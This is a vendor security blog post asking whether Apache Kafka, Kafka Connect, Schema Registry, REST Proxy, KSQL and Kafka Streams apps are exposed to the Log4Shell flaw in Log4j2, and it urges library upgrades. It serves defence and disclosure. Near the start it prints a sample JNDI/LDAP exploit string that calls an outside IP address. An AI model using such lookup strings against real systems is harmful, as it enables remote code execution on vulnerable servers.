Is Apache Kafka vulnerable to the Log4j2 (log4shell) exploit?

Information about a current cyber threat

Is Apache Kafka vulnerable to the Log4j2 (log4shell) exploit?

Last updated: December 20thWe will keep this blog article updated and will update the information and our recommendations as we learn new information and the threat situation changes.

Since this article went viral, a few words about us (if you haven’t heard of us yet)


We have developed an application that lets you develop Apache Kafka applications faster, makes management of the Apache Kafka ecosystem very easy, and enables you to monitor and analyze real-time data. KaDeck is available as a desktop application or web service (in your infra) for single users and teams.

A few hours ago, a 0-day exploit (CVE-2021-44228 – also called log4shell) was discovered in the popular Java logging library log4j2 that allows remote code execution (RCE) by logging a specific string (similar to SQL injections):

$\{jndi:ldap://32.189[.]202.232:11134/Basic/Command/Base64/ V2VsY29tZSB0byBYZW90ZWsgOi0pIEkgaG9wZSB5b3UgZW5qb3kgdGhlIGFydGljbGUuIEZv bGxvdyB1cyBvbiB0d2l0dGVyIEB4ZW90ZWtnbWJoIQ\}

The vulnerability occurs in the log library log4j version >= 2.0-beta9 and < 2.15 . The older version of the log4j library version 1 is not directly affected as of today. However, further development of version 1 of log4j has terminated 6 years ago (EOL notice), which is why Log4j2 is widely used.

Exploiting the vulnerability is very simple. The following requirements must be met:

  • Log4j version 2 must be used (>= 2.0-beta9 and < 2.15)
  • The attacker must have direct or indirect (when input data is forwarded to other systems and logged there) access to the target system.
  • The user input/request (user agents, domain paths, text input, …) must be logged.

Currently, millions of scans are taking place to exploit the vulnerability. A POC exists on Github that illustrates the exploit. An attack can therefore be carried out by an inexperienced hacker.

Update: Another update 2.17 has now been released, which closes another vulnerability (CVE-2021-45046) in Log4j2 that still existed despite the 2.15 update. However, in our opinion, the exploitation of this vulnerability is very unlikely, since it only works in one scenario, which should be rather rare in reality: the interpretation of the log string, which is comparable to SQL injections in the way it works and can be exploited to execute code, was disabled in 2.15 only for the actual message part of the log entry. Thus, this vulnerability still exists if the thread context name is logged, which should happen frequently, and external user input is set as the thread context name, which on the other hand should be the case rather rarely.

Nevertheless, the clear recommendation here can only be an update to 2.17.

How it works

Using a certain string logged by Log4j2, a class can be loaded into the application from an external system under the control of the hacker and executed (remote code execution).

This behavior can be disabled via a parameter for the JVM or the application (see section “Temporary mitigation” below). Newer Java versions have this behavior disabled by default: according to this blog post (see translation), JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by this LDAP attack (RCE). In these versions com.sun.jndi.ldap.object.trustURLCodebase defaults to false meaning JNDI is prevented from loading remote code using LDAP lookup.

However, the vulnerability can be exploited in other ways: by not loading the classes remotely, but instead serializing the malicious code in the message and using classes that are already in the classpath to load them. Thus, if there are classes in the classpath that process user input and pass it to the InitialContext.lookup() function, RCE can still be performed.

An attack using this method by targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers, is discussed in this blog post. This is also the reason why the mitigation via setting the JVM parameter 'formatMsgNoLookups=true' (which was a very widespread advice) is not sufficient and we have crossed out this part in the section “temporary mitigation” of this article.

Thus, it is not enough to use a current version of Java to not be vulnerable. An update to log4j2 version 2.16 is therefore absolutely necessary.

Is the Apache Kafka ecosystem affected by log4j2 exploit CVE-2021-44228?

A lot of companies use our software KaDeck to manage their Apache Kafka ecosystem and develop data streaming applications. For this reason, we have scanned and reviewed the Apache Kafka ecosystem for the vulnerability to inform our customers if action is required.

The list of components that we have checked (open-source versions):

  • Apache Kafka
  • Kafka Connect
  • Schema Registry
  • Rest Proxy
  • KSQL

The version numbers do not matter because the log4j libraries change only slightly over the different versions of Apache Kafka and the listed components, but not in a way that is relevant for the exploit.

The Apache Kafka components use an older version of log4j (slf4j-logj12.jar) and are therefore not vulnerable to the exploit as you can read in this article on SLF4J.org.

However, depending on the configuration, log4j version 1 can also be affected. This is the case when the configuration parameters TopicBindingName and TopicConnectionFactoryBindingName are used (e.g., when using the log4j JMS appender) and these options are set to a value that JNDI can handle, as pointed out by Luke Chen in this mail. This is normally not the case.

So your Apache Kafka deployment can be at risk, but it is very low, as it depends on your configuration. Please check your configurations, especially if you are using the JMS appender.

This assessment is consistent with other sources.

Apache Kafka Streams applications can be affected

Applications that use Kafka Streams, however, may be affected by the Log4j2 exploit. Since Kafka Streams applications are by their nature standalone Java applications, it is up to the developers to decide which log framework to use. Therefore, you should take the following steps if you are using Log4j2 in your Kafka Streams applications.

Monitoring log4shell attacks with KaDeck

KaDeck is also used in the security sector. A log4shell attack can be monitored in real-time with KaDeck.

If you already feed log information into a topic in Apache Kafka, you can use KaDeck to create a view that shows you all attacks live (or from the past).

The attacks mostly take place via the user agent string attribute. However, other fields cannot be excluded. Depending on whether your data is structured, a simple filter on attribute level with contain is sufficient.

The entire payload can also be checked via the search function:

This way you should be able to easily track down attacks that are making use of this exploit.

Temporary mitigation

If your Java applications (e.g., with Kafka Streams) use log4j2, you should first and foremost update the library to the latest 2.17 version.

Update: these mitigations are no longer recommended. Please update your log4j2 library.

KaDeck Web security patch

We have already rolled out a security patch 3.1.9.2 for KaDeck Web. However, since our KaDeck Web image does not use an affected JVM version and no user input is logged directly (which is a requirement for the attack), we could not find any way to exploit this vulnerability in KaDeck Web 3.1.9 so far. Furthermore, the use of KaDeck Web only takes place among internal employees, which means that external exploitation can be ruled out. We, therefore, classify the risk for our customers as LOW.

However, we strongly recommend updating KaDeck Web to the latest version.

Please continue to keep yourself informed regarding vulnerabilities in this environment. We will also keep you updated via our Twitter channel if there is any change in the threat situation. We will update this blog article accordingly.


Is Apache Kafka vulnerable to the Log4j2 (log4shell) exploit?

Software architect and engineer with a passion for data streaming and distributed systems.